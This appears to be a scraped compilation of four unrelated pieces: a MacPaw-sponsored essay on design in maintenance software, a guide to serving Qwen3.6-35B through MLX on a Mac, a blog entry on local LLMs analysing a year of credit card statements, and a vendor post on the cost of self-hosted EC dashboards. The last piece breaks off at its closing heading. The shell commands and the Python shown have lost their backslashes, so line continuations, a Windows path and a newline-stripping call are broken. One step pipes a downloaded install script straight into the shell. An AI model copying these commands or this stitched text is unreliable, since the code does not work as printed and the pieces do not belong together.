Rethinking The Experience Of System Tools

This article is a sponsored by MacPaw

Your grandmother’s vacuum was a trusty but ugly workhorse hidden in a dark closet. Dyson turned that practical tool into an aspirational product, one you love leaving out even when guests come over. Dish soap was just dish soap until Method put it in a glass container, and it became an addition to, not a distraction from, the aesthetics of your kitchen. Physical product brands spent the last two decades transforming mundane, practical items like soap and vacuums into must-have experiences.

But utility software — especially maintenance tools, a type of system software designed to analyze, configure, optimize, and maintain a computer — hasn’t made that leap from something you open as a chore to an experience you choose with excitement. And that means those brands are missing an interesting design opportunity: these tools are well overdue for a more intelligent, more human, and less emotionally flat approach.

“The Most Underexplored Frontier In UX Is The Maintenance Layer.”

Utility software still feels like a chore. Using it has all the excitement of pulling out that dusty old vacuum from the back of the closet. These four common software design assumptions illustrate why the category hasn’t yet transcended its chore status.

  • Assuming the user already resents the task: they’re here because something is wrong, not because they chose to open this tool. Designing accordingly means assuming they want the software to be fast, clinical, invisible, and something to get out of the way, not get into. But a design built for resentment produces tools that deserve it. If you expect your users to want to get out of the product as fast as possible, they’ll feel it in the design.
  • Assuming function is enough and feelings are for consumer apps: emotion in interface design is decoration. The maintenance layer is infrastructure, and nobody decorates infrastructure. But nobody decorated dish soap either, until Method. They didn’t change the product, just the user’s relationship to the tool they use to accomplish a task.
  • Assuming your users are not your fans because nobody cares about maintenance tools: utility tools don’t build communities, and nobody posts about running a disk cleanup. But people care deeply about tools that respect their time and make complex things simple for them to use. The MacPaw team listens to our community and implements many of the features they ask for, because we know users can be fans too, and they should shape how our products work.
  • Assuming that designers shouldn’t waste pixels on personality: you need to hide complexity and show minimal UI. Utility software should look neutral, technical, and forgettable.

But when software hides the system, people lose trust in it.

Design always starts with function — function shapes form. But if that function can’t be made completely invisible and people still have to interact with it, it inevitably becomes part of their experience. In that case, people expect it not just to work, but to match their environment, influence their mood, and contribute to their overall experience.

A good example is a watch. Its core function is simple: show the time. But because a watch occupies physical space in a person’s world, you want more from it than just functionality. It needs to play an aesthetic role and complement the environment.

“The Maintenance Layer Is A Behavioral Problem, Not Just A UX One.”

The user experience in utility software matters more than the industry tends to admit. In utility software, experience is not something added on top of function. It emerges from how the function is structured, explained, and interacted with. If you think you can design the most functional app on the market without considering how users understand and experience the process, you’re missing an opportunity to build a relationship with that user.

Part of that ignored UX element is a behavioral problem: users don’t avoid utility software because using it is hard, but instead because it produces no positive emotional signal at any point. The problem is rarely complex. It’s the absence of meaningful interaction during the process of using the app.

Another issue is focusing solely on function. The aesthetic-usability effect shows us clearly that if something looks better, it feels better — ATM screens in a 1995 study were judged easier to use if the screen layout was more attractive. Even something as purely functional as an ATM screen display needs attention to how the function is structured, presented, and perceived.

And then there’s the memory problem. People remember the emotional peak and the ending of an experience, not the average. A completed process that ends with a clear “done” is remembered more positively than one that just fades out, even if the end task is completed successfully in both cases. System tools rarely intentionally design the ending of an interaction — they just stop running.

“Thoughtful System Design Can Transform Maintenance From A Technical Chore Into A Seamless User Experience.”

What does emotional design actually mean, then, in utility UX? Here are three principles the MacPaw team follows to design its products against the category norm.

Translating system complexity into human language

Maintenance tools deal with storage, task management, and background processes. Good design explains what’s happening, avoids system jargon, and communicates outcomes clearly.

Linear’s game-changing move that illustrates this principle was agreeing on straightforward units of work, like projects and teams, that any new user can immediately understand. That helps them spend less time ramping up and more time building.

Make the process clear and show progress

System tools run complex processes. Design should show progress, impact, and system change to create trust and control.

Vercel’s deployment infrastructure is an excellent example here. When you trigger a build, the browser tab favicon changes — a spinner while building, a green checkmark when done, a red X if it fails. It’s ruthlessly functional, not visual or warm, but it’s emotionally intelligent: it exists purely to reduce the low-level anxiety of waiting for a build to finish.

Design the moment of completion

Maintenance tasks often end quietly. But completion is the emotional payoff. Design should emphasize clarity of results, a sense of resolution, and visible improvement so users remember a positive and distinct ending.

Take the new CleanMyMac by MacPaw after its 2024 major update. Unlike the maintenance utility category norm, CleanMyMac uses visual language, including color, depth, motion, icons, and 3D illustrations, to shift the focus from diagnosing problems to showing progress: space cleared, threats removed, time saved. Instead of confronting the user with what’s wrong, the interface closes with a picture of a machine that’s already working better.

The task is the same, but the ending tells a different story, giving the user a picture of a machine that’s already working better.

“Even if you don’t care about emotional design as a principle, the change is coming anyway.”

The market is forcing this issue even for those who don’t find the argument I’ve made here compelling.

That’s partly generational — designers and users who grew up with Linear, Figma, and Notion have a completely different baseline for the tools they use. Good software is not a happy accident for them, but a given. That generation is now the primary audience for maintenance software, and so the old “it’s fine, it’s just a utility” excuse doesn’t work philosophically or commercially. Just like Dyson and Method changed how entire product categories approached design, the current state of utility software is shifting for good.

And digital fatigue is the current cultural state. The resurgence of vinyl records, film cameras, and dumbphones is not merely nostalgia, but a signal that the emotional relationship between people and their tools is changing.

The question has shifted from whether your utility software should feel better to use to whether it can afford not to.

# How to Run Qwen3.6-35B on Your Mac at 77 tok/s

Level: intermediate

Estimated time: 20-40 minutes (most of it is the model download)

Minimum requirements: Mac with Apple Silicon (M1/M2/M3/M4) and 48 GB of unified RAM

What are we setting up?

A local server compatible with the OpenAI API that runs the Qwen3.6-35B-A3B model (quantized to 4 bits) using MLX, Apple’s Machine Learning framework for Silicon. When you’re done, you’ll have an endpoint at http://127.0.0.1:7979 that you can point any OpenAI-compatible client to (OpenCode, Continue, Cursor, etc.).

Metric Measured value
Generation throughput ~77 tok/s
TTFT (time-to-first-token) ~0.25 s
Context window 65 536 – 131 072 tokens
RAM required ~20 GB model + ~12 GB KV cache

Prerequisites

Hardware

  • Mac with Apple Silicon chip (M1 Pro/Max/Ultra or M2/M3/M4 equivalents)
  • Minimum 48 GB of unified RAM (the quantized model takes ~20 GB; the KV cache needs up to 12 GB additional)

Software

# Check Python version (you need 3.11+)
python3 --version

# Check that you have git
git --version

If you don’t have Python 3.11, install it with Homebrew:

brew install python@3.11

Step 1 — Create the virtual environment

From the folder where you want to install everything:

mkdir mlx-server && cd mlx-server
python3.11 -m venv .venv
source .venv/bin/activate

Step 2 — Install dependencies

pip install --upgrade pip

# MLX and the OpenAI API-compatible server
pip install mlx-lm
pip install mlx-openai-server

Verify the installation:

mlx-openai-server --help

Step 3 — Download the model

The model is automatically downloaded from Hugging Face the first time you run it. It takes approximately 20 GB of disk space.

# Optional pre-download (recommended to track progress)
python3 -c "
from mlx_lm import load
model, tokenizer = load('mlx-community/Qwen3.6-35B-A3B-4bit')
print('Model downloaded successfully')
"

Note: You need a huggingface.co account and to accept the model’s terms if the repository requires it. For this model it is not required.

Step 4 — Start the server

Option A — Direct command (simpler)

mlx-openai-server launch 
  --model-path mlx-community/Qwen3.6-35B-A3B-4bit 
  --model-type lm 
  --host 127.0.0.1 
  --port 7979 
  --tool-call-parser qwen3_coder 
  --reasoning-parser qwen3_5 
  --enable-auto-tool-choice 
  --context-length 65536 
  --temperature 0.7 
  --top-p 0.8 
  --top-k 20 
  --min-p 0.0 
  --repetition-penalty 1.05 
  --max-bytes 12884901888 
  --prompt-cache-size 3 
  --log-level INFO

Option B — Startup script (recommended)

Save the following script as start-mlx-server.sh:

#!/usr/bin/env bash
set -euo pipefail

SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
VENV="$SCRIPT_DIR/.venv"

# Default profile: high_context
# Change with: MLX_PROFILE=baseline ./start-mlx-server.sh
PROFILE="${MLX_PROFILE:-high_context}"

MODEL_PATH="mlx-community/Qwen3.6-35B-A3B-4bit"
HOST="127.0.0.1"
PORT="7979"

TOOL_CALL_PARSER="qwen3_coder"
REASONING_PARSER="qwen3_5"

TEMPERATURE="0.7"
TOP_P="0.8"
TOP_K="20"
MIN_P="0.0"
REPETITION_PENALTY="1.05"
MAX_CACHE_BYTES="12884901888"  # 12 GB

DRAFT_MODEL="mlx-community/Qwen3.5-0.8B-MLX-4bit"
NUM_DRAFT_TOKENS="${MLX_NUM_DRAFT_TOKENS:-4}"

case "$PROFILE" in
    baseline)
        CONTEXT_LENGTH="65536"
        PROMPT_CACHE_SIZE="3"
        EXTRA_ARGS=""
        ;;
    high_context)
        CONTEXT_LENGTH="131072"
        PROMPT_CACHE_SIZE="5"
        EXTRA_ARGS=""
        ;;
    speculative)
        CONTEXT_LENGTH="65536"
        PROMPT_CACHE_SIZE="3"
        EXTRA_ARGS="--draft-model-path ${DRAFT_MODEL} --num-draft-tokens ${NUM_DRAFT_TOKENS}"
        ;;
    speculative_high)
        CONTEXT_LENGTH="131072"
        PROMPT_CACHE_SIZE="5"
        EXTRA_ARGS="--draft-model-path ${DRAFT_MODEL} --num-draft-tokens ${NUM_DRAFT_TOKENS}"
        ;;
    *)
        echo "Unknown PROFILE: $PROFILE"
        echo "Options: baseline, high_context, speculative, speculative_high"
        exit 1
        ;;
esac

exec "$VENV/bin/mlx-openai-server" launch 
    --model-path "$MODEL_PATH" 
    --model-type lm 
    --host "$HOST" 
    --port "$PORT" 
    --tool-call-parser "$TOOL_CALL_PARSER" 
    --reasoning-parser "$REASONING_PARSER" 
    --enable-auto-tool-choice 
    --context-length "$CONTEXT_LENGTH" 
    --temperature "$TEMPERATURE" 
    --top-p "$TOP_P" 
    --top-k "$TOP_K" 
    --min-p "$MIN_P" 
    --repetition-penalty "$REPETITION_PENALTY" 
    --max-bytes "$MAX_CACHE_BYTES" 
    --prompt-cache-size "$PROMPT_CACHE_SIZE" 
    --log-level INFO 
    $EXTRA_ARGS
chmod +x start-mlx-server.sh
./start-mlx-server.sh

Usage examples:

./start-mlx-server.sh                                      # high_context (default)
MLX_PROFILE=baseline ./start-mlx-server.sh                # maximum throughput
MLX_PROFILE=speculative ./start-mlx-server.sh             # speculative decoding
MLX_PROFILE=speculative MLX_NUM_DRAFT_TOKENS=6 ./start-mlx-server.sh

Step 5 — Verify it works

In another terminal, send a test request:

curl http://127.0.0.1:7979/v1/chat/completions 
  -H "Content-Type: application/json" 
  -d '{
    "model": "mlx-community/Qwen3.6-35B-A3B-4bit",
    "messages": [{"role": "user", "content": "Hello, what is 2+2?"}],
    "max_tokens": 100
  }'

You should see a JSON response with the choices[0].message.content field.

Stopping the server

pkill -f mlx-openai-server

Or if you have the stop-mlx-server.sh script:

#!/usr/bin/env bash
pkill -f mlx-openai-server && echo "Server stopped."

Connect with your favorite client

The server exposes a 100% OpenAI-compatible API. Just point the base_url to your local server.

OpenCode

Create or edit the opencode.json file in the root of your project:

{
  "$schema": "https://opencode.ai/config.json",
  "provider": {
    "mlx-local": {
      "npm": "@ai-sdk/openai-compatible",
      "name": "MLX Local (Qwen3.6-35B)",
      "options": {
        "baseURL": "http://127.0.0.1:7979/v1"
      },
      "models": {
        "mlx-community/Qwen3.6-35B-A3B-4bit": {
          "name": "Qwen3.6-35B-A3B-4bit (local MLX)",
          "limit": {
            "context": 65536,
            "output": 32768
          }
        }
      }
    }
  }
}

Continue / Cursor

Base URL: http://127.0.0.1:7979/v1
API Key:  any-value  (the server does not validate it)
Model:    mlx-community/Qwen3.6-35B-A3B-4bit

Python (openai SDK)

from openai import OpenAI

client = OpenAI(
    base_url="http://127.0.0.1:7979/v1",
    api_key="local"
)

response = client.chat.completions.create(
    model="mlx-community/Qwen3.6-35B-A3B-4bit",
    messages=[{"role": "user", "content": "Explain what a transformer is"}]
)
print(response.choices[0].message.content)

Configuration profiles

Profile Context Cache tok/s measured When to use
baseline 65 536 3 entries 77.4 Maximum throughput
high_context 131 072 5 entries 75.7 Long documents, extended contexts (default)

The performance difference between both profiles (~2%) is within the noise margin. Use high_context if you work with large files or very long conversations.

Key parameters explained

Parameter Value Why it matters
--max-bytes 12884901888 12 GB Critical. Without this limit the model’s KV cache (MoE architecture with ArraysCache) grows unchecked until it exhausts RAM on contexts >30k tokens
--prompt-cache-size 3 3 LRU entries Limits how many conversations the prefix cache keeps in memory
--context-length 65536 64k tokens Maximum context window per request
--temperature 0.7 Balance between creativity and coherence
--repetition-penalty 1.05 Reduces repetitions in long responses

Troubleshooting

The server disconnects after 30,000 tokens

This was a known bug with the Qwen3.6-35B-A3B model due to its hybrid MoE architecture. The fix is to make sure you pass --max-bytes 12884901888. With this parameter the server works correctly up to 60,000+ tokens (verified).

Architecture notes (for the curious)

Qwen3.6-35B-A3B is a hybrid MoE (Mixture of Experts) model. Instead of activating all parameters per token, it only activates a subset of “experts”, making it efficient for its size. The 4bit version quantizes the weights to 4 bits, reducing RAM usage from ~70 GB to ~20 GB with minimal quality loss.

MLX leverages Apple Silicon’s unified memory: the GPU and CPU share the same RAM pool, eliminating the transfer bottleneck that exists in systems with a dedicated GPU. That’s why a Mac with 48 GB can run a model that on a PC would require a GPU with 80 GB of VRAM.

References

  • MLX on GitHub
  • mlx-lm
  • Model on Hugging Face
  • mlx-openai-server

[Day 3] I Had a Local LLM Analyze a Year of My Credit Card Statements

[Day 3] I Had a Local LLM Analyze a Year of My Credit Card Statements

Intro

Day 3: I’m going to hand a year of credit card statements over to a local LLM and see what it can do.

This is experiment #3.

What I’m using today: DGX Spark + Ollama + Qwen2.5 (comparing 7B vs 72B). Ollama is the de-facto local-LLM runtime, and Qwen2.5 is a multilingual model from Alibaba (China) that handles Japanese reasonably well, apparently.

Today’s setup

  • Data: 12 months of credit card statements from a single card.
  • Volume: 383 transactions, ¥2,761,555 in total spend.
  • Goal: get the AI to spot waste patterns and propose savings.
  • Comparison axes:

    • Model size: 7B (light) vs 72B (heavy)
    • Input format: raw CSV vs pandas-aggregated summary
    • 4 patterns total

Takeaway: “If you ask an AI to aggregate raw data, the numbers come out way off.” / “If you pre-aggregate with a spreadsheet tool first and then feed the AI, you get fast and accurate results.” A small but practical finding.

1. Get the CSVs onto the DGX

Log into the credit card company’s web statements page on myPC1 (my Windows laptop), download 12 months of CSVs, then push them to the DGX.

I deliberately skipped GitHub for the transfer this time — once you push something, it’s in the history forever, and credit card data shouldn’t be there even briefly. Instead, I used direct PC-to-PC transfer over SSH (one command, finishes in seconds; details in the collapsibles at the end). The .gitignore excludes private-data/ too, so accidental commits are ruled out.

2. Install Ollama

Ollama is the de-facto runtime for local LLMs. One command should be enough.

There was a small password hiccup during install (details below), but eventually it was up and running.

The DGX Spark specs really show through:

  • Memory: 121 GB
  • Default context window: ~262,144 tokens

In other words: “throw a whole book at it, no problem” territory. Reassuring.

3. Two model sizes: Qwen2.5 7B vs 72B

The strategy: same model family, different sizes. That way the differences come from size, not architecture.

  • 7B (light): ~4.7 GB, downloads in 5 minutes. Fast.
  • 72B (heavy): ~47 GB, 25 minutes to download. Slow but smart.

What does “B” mean? Short for Billion. It’s the number of “weights” inside the AI — more weights, more it remembers, basically. So 7B has 7 billion weights, 72B has 72 billion.

Loading both onto the DGX simultaneously, memory usage looks like:

AI model Memory occupied
qwen2.5:72b 61 GB
qwen2.5:7b 8.2 GB
Total 69 GB

69 GB. Spacious!

4. Prepping the CSVs

Once I had the CSVs in hand, three small headaches before they were ready for the AI:

  • Headache 1: An older encoding (Windows Japanese flavor) → needs converting to modern UTF-8
  • Headache 2: Some merchant names contain commas, which breaks naive CSV parsing
  • Headache 3: Each file has a “monthly total” line at the end that isn’t actually data

Details in the collapsible. After cleanup, the 12 files merge into a single dataset:

Item Value
Transactions 383
Period 12 months (1 year)
Total spend ¥2,761,555
Avg per tx ¥7,210
Median per tx ¥3,000
Largest single tx ¥209,283 (overseas flight)
Smallest ¥-3,980 (refund)

Now to feed this to 7B and 72B and see what each of them says.

5. Experiment 1: Throw the raw CSV at the AI

No tricks: all 383 rows, straight at the AI. Prompt is the full ask: “As a household budget consultant, output category breakdown / monthly trend / waste patterns / savings suggestions / lifestyle hypothesis.”

7B’s answer (75 seconds)

…this is where the numbers go wildly off.

Item What 7B said Real data Match?
Amazon total ¥2,014,386 (257 tx) ¥693,663 (166 tx)
Amazon Downloads ¥2,014,386 (257 tx) ¥80,323 (50 tx)
Outdoor brand ¥495,740 ¥154,820
A local recreation venue “¥49,574” cited (a different small charge actually exists)

None of the numbers line up. Amazon total is roughly 3× off, Amazon Downloads about 25× off, and the cited venue context is a different charge entirely.

Reading 383 rows of CSV and computing totals turned out to be a heavy lift for the 7B model.

72B’s answer (12m 9s)

What if we throw size at the problem? After 12 minutes of patience:

Item What 72B said Real data Match?
Amazon total ¥635,792 (104 tx) ¥693,663 (166 tx)
AI/dev tools ¥193,629 (21 tx) ¥176,850 (24 tx)
Travel ¥487,555 (43 tx) ¥416,268 (8 tx)

Not exact, but the off-by amounts are within ~10%, and there are no fabricated venues. A real improvement.

However — when asked about the monthly trend, here’s what 72B said:

Month 1: ¥316,789 → Month 2: ¥229,600 → Month 3: ¥237,500 → … → Month 12: ¥291,500
(Gradually increasing.)

The actual range is ¥69,961 (low) to ¥493,072 (high) — a chaotic up-and-down waveform. “Gradually increasing” isn’t quite right. Even 72B isn’t great at aggregating distributed data over a long CSV.

6. Experiment 2: Aggregate first, then feed the AI

If the AI struggles with aggregation, do the aggregation in a different tool first and only hand the AI the result.

The flow:

📥 Raw CSV (22,132 chars, 383 rows)
       ↓
🔧 Pre-aggregate with a spreadsheet tool (Python's pandas)
       ↓
📋 Aggregate summary (1,884 chars, ~90% smaller)
       ↓
🤖 Hand it to the AI (let it interpret and propose)

Python’s pandas = a spreadsheet-like library, but ~10,000× more powerful than Excel functions, used for tabular data analysis.

7B + pre-aggregated input (50 seconds)

Numbers are fully accurate now.

Item What 7B said Real data Match?
Amazon total ¥693,663 ¥693,663
AI/dev tools ¥176,850 ¥176,850
Monthly max ¥493,072 ¥493,072
Monthly min ¥69,961 ¥69,961

Quoting straight from the pre-aggregated numbers, the hallucinations vanished.

And 7B did this in 50 seconds — better quality than the 72B + raw CSV at 12 minutes. Quietly remarkable.

Before (raw CSV) After (aggregated)
Time 75s 50s
Numbers wildly off exact
Verdict not usable as-is quote directly

72B + pre-aggregated input (12m 13s)

72B’s numbers also match exactly (well, since they’re being quoted from pre-aggregated data, that’s expected). The proposal quality was the strongest of the four patterns:

Reduce Amazon dependency

  • Current: online shopping (Amazon family) is 25.1% of total (¥693,663).
  • Suggestion: stick to essentials only, regular review, avoid impulse buys.
  • Expected savings: ¥57,805/month average (25% reduction) → ¥693,660/year

…wait, hold on. Annual Amazon spend was ¥693,663. The “savings” 72B suggests is ¥693,660. That’s basically the same number. So the proposal is effectively “stop buying on Amazon entirely (100%)” — definitely not 25%. Apparently 72B’s percentage arithmetic isn’t bulletproof either.

That aside, the lifestyle hypothesis section was kind of striking. Here’s what 72B observed:

  • Heavy reliance on apps and subscriptions: “App/subscription” category is 10.5% of total
  • Frequent international travel: “Travel/airline” is 15.1%, with notable overseas charges
  • Frequent online shopping: “Online (Amazon)” is 25.1% of total

It’s just one card’s data, so this isn’t a complete picture — but if I fed an AI my full household financials, the analysis and advice would probably go a lot deeper.

Summary: 4 patterns

# Model Input Time Numerical accuracy Proposal quality
1 7B Raw CSV 75s ❌ Numbers way off
2 72B Raw CSV 12m 9s △ Misread monthly trend
3 7B Aggregated 50s ✅ Exact ○ Some repetition
4 72B Aggregated 12m 13s ✅ Exact ◎ Best (mind the % math)

Quietly notable: 72B takes ~12 minutes regardless of input size (shrinking the prompt didn’t change wall-clock time much). Output generation is the bottleneck. Which strengthens the case for “small model + pre-aggregate” as the cost-effective default.

7. Cross-check: the actual graphs

Before trusting any of the AI output, let me put the real numbers on charts using the spreadsheet tool (pandas).

Monthly spending

Monthly spending

Average ¥230,130/month, but the range is ¥69,961 (lowest) to ¥493,072 (highest) — about a 7× spread. The 72B’s “gradually increasing” claim was a bit off the mark; the reality is bouncy.

Category share

Categories

“Other” being 32% is because my categorization rule is sloppy. I just wrote a simple “if the merchant name contains keyword X, bucket Y” rule, and lots of merchants didn’t match any keyword and ended up in “Other.” Reading meaning from a merchant name is exactly the kind of thing AI is good at, so next time I’ll let the AI do the categorization itself.

Top 15 merchants

Top merchants

Amazon at ¥421,978 (105 tx) is far and away #1. Amazon really is too convenient…

Weekday rhythm

Weekday pattern

Tuesday alone is ¥692,549 — way above the rest. Probably because that’s when most of the subscription auto-charges land.

8. Today’s takeaways

Separate “aggregation” from “interpretation”

AI is bad at AI is good at
Multi-row sum/average (numbers go wildly off) Categorization (interpreting fuzzy meaning)
Percentage math (saw “25% off → 100% off”) Pattern recognition / hypothesis generation
Distributed aggregation like monthly totals Narrative interpretation, savings proposals

Aggregation is the spreadsheet tool’s job; interpretation is the AI’s. When you split the work, things go fast and accurate. “Data prep matters before analysis” — yeah, that old saying really is true. Note to self.

Sometimes input quality beats raw size

“7B + pre-aggregated input in 50 seconds” outperformed “72B + raw CSV in 12 minutes”. Sometimes you don’t need a bigger model — you need cleaner input. Felt that one today.

The local-LLM angle

Feeding 12 months of raw credit card data to an AI without a single byte going to the cloud — it was surprisingly stress-free. This is one of the spots local LLMs really shine. Got personal info, or anything cloud-uncomfortable? This is the place for them.

9. Tech details (Claude explains)

The technical bits, written up by my AI pair.

  1. SCP transfer to the DGX (mDNS, no IP needed)

NVIDIA Sync auto-configures a Host alias in ~/AppData/Local/NVIDIA Corporation/Sync/config/ssh_config:

Host spark-XXXX.local
  Hostname spark-XXXX.local
  User [user]
  Port 22
  IdentityFile "...\nvsync.key"

Which means I can SSH/SCP using spark-XXXX.local without ever looking up an IP. The .local suffix uses mDNS (Multicast DNS) for hostname resolution within the LAN.

Transfer command (one line, from PowerShell on the Windows side):

scp -r "C:Users[user]Desktopdocsdgxcsv" spark-XXXX.local:/home/[user]/personal/dgx-100-experiments/private-data/credit-card-csv
  1. Ollama install + the sudo-TTY catch + GPU detection log

Ollama install:

curl -fsSL https://ollama.com/install.sh | sh

Running this through Claude Code’s Bash, it errored at the sudo password prompt — an interactive TTY is required there:

sudo: a terminal is required to read the password

Reopened a separate SSH session, ran the same command manually, and it went through.

Once installed, systemd auto-starts the service. The GPU detection log via journalctl -u ollama:

inference compute id=GPU-986c194b... name=CUDA0 description="NVIDIA GB10"
total="121.7 GiB" available="79.0 GiB"
default_num_ctx=262144
  • VRAM (DGX Spark unified memory): 121.7 GiB
  • Default context: 262,144 tokens

Compared with a typical RTX 4090 (24 GB VRAM, 8K–32K default context), the gap is significant.

  1. Loading both models simultaneously
ollama pull qwen2.5:7b   # 4.7 GB
ollama pull qwen2.5:72b  # 47 GB

After loading both, ollama ps shows:

NAME           SIZE      PROCESSOR    CONTEXT    
qwen2.5:72b    61 GB     100% GPU     32768
qwen2.5:7b     8.2 GB    100% GPU     32768

Total ~69 GB used out of 79 GB available. Both models stay resident, switching between them is instant.

  1. Custom CSV parser for the credit card data

Three quirks needed handling: CP932 encoding, no quotes (commas in some merchant names break parsing), and a trailing summary row in each file.

def parse_line(line: str) -> list[str] | None:
    fields = line.rstrip("rn").split(",")
    if len(fields) < 7 or not fields[0]:
        return None  # skip blank/summary rows
    if len(fields) > 7:
        merchant = ",".join(fields[1:-5])
        fields = [fields[0], merchant] + fields[-5:]
    return fields


def load_one(path: Path) -> pd.DataFrame:
    rows = []
    with path.open(encoding="cp932") as f:
        next(f)  # skip header (cardholder metadata)
        for line in f:
            parsed = parse_line(line)
            if parsed is not None:
                rows.append(parsed)
    df = pd.DataFrame(rows, columns=COLUMNS)
    df["利用日"] = pd.to_datetime(df["利用日"], format="%Y/%m/%d")
    df["利用金額"] = df["利用金額"].astype(int)
    return df
  1. Japanese fonts in matplotlib

japanize-matplotlib doesn’t work on Python 3.12 — it imports distutils, which was removed from the standard library.

The modern replacement is matplotlib-fontja:

pip install matplotlib-fontja
import matplotlib_fontja  # noqa: F401  ← just importing it sets up IPAexGothic
  1. Calling Ollama from Python

The official ollama Python client is straightforward:

import ollama

client = ollama.Client()
stream = client.chat(
    model="qwen2.5:72b",
    messages=[
        {"role": "system", "content": SYSTEM_PROMPT},
        {"role": "user", "content": user_prompt},
    ],
    options={"temperature": 0.3},
    stream=True,
)
for chunk in stream:
    print(chunk["message"]["content"], end="", flush=True)

Streaming makes long generation easier to watch unfold.

Tomorrow: Day 4

Day 4 plan: let a local AI sort 20,000 iPhone photos.

The actual goal is to have a local image-recognition model (CLIP family?) clean up my photo library so I can stop paying iCloud for storage upgrades…!

100ExperimentsWithDGX #LocalLLM #Ollama

The Hidden TCO of Self-Hosting Your EC Revenue Dashboard in 2026

“If we self-host Matomo or Umami, the revenue dashboard is free, right?” That’s one of the most common questions I hear from SMB EC operators in Japan. The short answer: license-fee-free is not TCO-free. After laying four options side-by-side at Japanese freelance rates, self-hosted dashboards land at ¥460K-880K per year — 4-7x the cost of a focused SaaS like the one I’m building.

I’ve been building RevenueScope for the Japan SMB EC market, so I have a stake in this comparison. But the math here is structural, not promotional: when you account for build hours, ongoing ops, server costs, and learning curve, “free” OSS quietly becomes one of the most expensive choices on the table.

This post walks through the TCO breakdown, the three hidden cost layers most operators miss, and a 3-question framework that decides between self-hosted and SaaS in about 60 seconds.

TL;DR

  1. Self-hosting Matomo, Umami, or rolling your own GA4+Looker Studio dashboard runs ¥460K-880K per year at a ¥5,000/hour Japanese freelance rate (industry-average estimates, not measured ground truth).
  2. A focused SaaS option for SMB EC — RevenueScope Growth at ¥9,800/month (~¥117K/year) — sits 4-7x lower on TCO.
  3. The hidden cost is a three-layer stack: opportunity cost (40 build hours not spent on revenue work), learning curve (Matomo configs, GA4 event design, Looker DAX), and upgrade churn (OSS major versions, GA4 API breaks). License-fee-zero hides all three.

Why “TCO” matters more than license fees

The “OSS is free” intuition only counts software license cost. Real total cost of ownership for an EC operator pulls in at least four other line items:

  • Initial build hours — server setup, tracking install, dashboard build, first-pass QA
  • Monthly ops hours — data quality checks, tracking fixes, new metric requests, incident response
  • Server cost — VPS / cloud / storage
  • Learning curve — docs, Stack Overflow, internal wiki, knowledge transfer

Counted as labor at ¥5,000/hour (the Japanese freelance marketing/data-analyst median), self-hosted TCO climbs into the high hundreds of thousands of yen — quickly.

The second concept that operators tend to miss is opportunity cost. Forty hours spent building a Matomo dashboard is forty hours not spent on creative A/B tests, LP iterations, or email segmentation work. For a JPY-10M-monthly EC, those forty hours represent roughly 25% of a working month — directly tradeable against revenue work.

License-fee-zero and TCO-zero are different numbers. That’s the starting point for any honest comparison.

One-year TCO across four options

I lined up Matomo On-Premise, Umami v3, GA4 + Looker Studio, and RevenueScope Growth at industry-average estimates (not measured ground truth — your numbers will vary).

One-Year TCO Comparison — Matomo / Umami / GA4+Looker / RevenueScope

The annual numbers (rounded, ¥5,000/hr labor):

  • Matomo self-hosted — ~¥880K (40h build + 8h/mo ops + ¥3K/mo hosting + 16h learning)
  • Umami self-hosted — ~¥460K (20h build + 4h/mo ops + ¥2K/mo hosting + 8h learning)
  • GA4 + Looker Studio — ~¥500K (16h build + 6h/mo ops + 12h learning; product is free, your time isn’t)
  • RevenueScope Growth — ~¥117K (¥9,800/mo plan + ~0.5h/mo to actually look at the dashboard)

The “free” intuition collapses the moment you add 40 build hours and 6-8 ongoing ops hours per month at Japanese freelance rates. The license is the small line item; labor is everything else.

The three hidden cost layers

Beyond the headline numbers, three layers of hidden cost stack on top of self-hosting and account for most of the gap between OSS and SaaS economics.

Annual Operations Hours — 4-Option Comparison (the symbol of hidden labor)

Layer 1 — Opportunity cost. Forty hours building Matomo is forty hours not running creative A/B tests or shipping LP improvements. For JPY-10M-monthly EC, that’s roughly 25% of a working month redirected away from revenue work. The TCO row “build hours = ¥200K” is the direct cost; the indirect cost (campaigns not run, pages not improved) is often larger.

Layer 2 — Learning curve. Matomo’s admin surface is dense; custom report authoring is close to writing SQL by hand. GA4 demands real care around event design, custom dimensions, and the data layer. Looker Studio adds calculated-field syntax (DAX-adjacent) plus BigQuery SQL knowledge if you take the connector route. Each one has a real ramp before the dashboard becomes operational.

Layer 3 — Upgrade churn. OSS ships major versions; GA4 breaks API contracts; Looker Studio re-skins UIs. Matomo schema migrations, GA4 export schema changes that retroactively break your queries, Looker chart configs that need re-doing — these arrive a few times a year and don’t fit cleanly into the “monthly ops hours” budget. SaaS providers absorb this churn on your behalf.

Stack the three layers together and the gap between “Matomo at ¥880K” and “RevenueScope at ¥117K” stops looking like a margin choice. It looks like a structurally different cost model.

A 3-question decision framework

For SMB EC operators wondering which side they fall on, three binary questions resolve it in about 60 seconds.

Self-Build vs SaaS — Decision Flow

Q1 — Are you a JPY-10M-50M monthly Shopify / BASE / STORES / EC-CUBE operator? If yes, continue. If under JPY-10M, GA4 + Looker Studio with a hand-built dashboard is usually proportionate. If over JPY-1B, you’re in BI-tool territory (Tableau, Looker, Mode).

Q2 — Do you want engineering and ops hours pointed at revenue work, or at dashboard maintenance? If revenue work, lean toward SaaS. If dashboard work is part of how you want to spend the team, OSS makes sense — and it’s a legitimate choice when you have an in-house philosophy around tooling ownership.

Q3 — Are Revenue, AOV, RPS, CVR, plus Sessions enough? If yes — that’s RevenueScope’s deliberate scope cap (4 core metrics + Sessions = 5 KPI cards). If you need MMM, MTA, margin, LTV, inventory, or in-app ROAS computation, look at full-stack tools (Triple Whale category) instead.

Note: RevenueScope intentionally does not compute ad-spend ROAS in-app. Ad consoles (Meta, Google, TikTok) already surface ROAS natively; calculating it again in a separate tool just doubles the surface area to maintain. Delegating ROAS to the tool best positioned to compute it is a deliberate scope decision.

When self-hosting genuinely makes sense

To be clear about when OSS or DIY is the right answer:

  • Compliance-driven — when first-party customer-data residency on your own servers is a hard requirement (large enterprise, regulated industries)
  • Engineering-rich teams — when in-house engineers are already comfortable with Linux server ops and treat tooling as part of the platform
  • Bespoke metrics — when you need indicators no SaaS will model out of the box, and you want full control over the schema
  • Above JPY-1B/month — at large scale, SaaS per-event pricing can flip; self-hosting can become the cheaper option

For SMB EC with marketing teams of 1-3 and no dedicated engineer, none of these usually apply. That’s the population where the TCO gap matters most — and where a focused SaaS earns its keep by removing the three hidden cost layers entirely.

Closing

